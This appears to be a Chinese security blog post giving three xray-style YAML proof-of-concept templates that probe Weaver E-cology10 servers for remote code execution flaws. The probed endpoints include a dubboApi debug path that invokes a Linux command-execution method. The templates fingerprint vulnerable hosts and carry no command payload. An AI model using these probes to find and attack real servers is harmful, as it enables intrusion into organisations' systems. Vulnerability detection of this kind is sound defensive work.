漏洞挖掘 | 2 分钟
泛微E-cology10 xmReport、dubboApi、saveSignAddrsInfo 远程代码执行漏洞 Poc
三月 2, 2026
RCE

泛微 E-cology10 xmReport远程代码执行漏洞

yaml
 1name: poc-yaml-weaver-ecology10-archive-rce
 2transport: http
 3
 4rules:
 5
 6  r0:
 7    request:
 8      method: GET
 9      path: /papi/archive/aux/xmReport/preview
10    expression: |-
11      response.status == 405 && response.body_string.contains('"error":"Method Not Allowed"')
12      && response.body_string.contains('"path":"/papi/archive/aux/xmReport/preview"')      
13
14  r1:
15    request:
16      method: POST
17      path: /papi/archive/aux/xmReport/preview
18      headers:
19        Content-Type: application/x-www-form-urlencoded
20      body: ""
21    expression: |-
22      response.status == 200 && response.body_string.contains('"code":500')
23      && response.body_string.contains('"msg":"系统错误"')
24      && response.body_string.contains('"status":false')
25      && response.body_string.contains('"fail":true')      
26
27
28expression: r0() && r1()

泛微 E-cology10 dubboApi远程代码执行漏洞

yaml
 1name: poc-yaml-weaver-ecology10-dubbo-debug-rce
 2transport: http
 3
 4rules:
 5  r1:
 6    request:
 7      method: POST
 8      path: /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=com.weaver.dw.platform.spark.util.LinuxCommand&methodName=execCmdWaitStdOut
 9      headers:
10        Content-Type: application/json
11      body: '[]'
12    expression: >
13      response.status == 200 && response.body_string.contains('"code":500')
14      && response.body_string.contains('"msg":"系统错误"')
15      && response.body_string.contains('"status":false')
16      && response.body_string.contains('"fail":true')      
17expression: r1()

泛微 E-cology10 saveSignAddrsInfo远程代码执行漏洞

yaml
 1name: poc-yaml-weaver-ecology10-hessian-rce
 2
 3transport: http
 4
 5set:
 6  key: randomLowercase(12)
 7
 8rules:
 9
10  r1:
11    request:
12      method: POST
13      path: /papi/calendar/saveSignAddrsInfo
14      headers:
15        Content-Type: application/json; charset=utf-8
16      body: >
17        {}        
18    expression: response.status == 200 && response.body_string.contains('"data":"缺少参数或者参数错误"')
19
20  r2:
21    request:
22      method: GET
23      path: /papi/calendar/getSignAddrsInfo?key=r_{{key}}
24    expression: response.status == 200 && response.body_string.contains('"msg":"接口返回成功"') && response.body_string.contains('"status":true')
25
26expression: r1() && r2()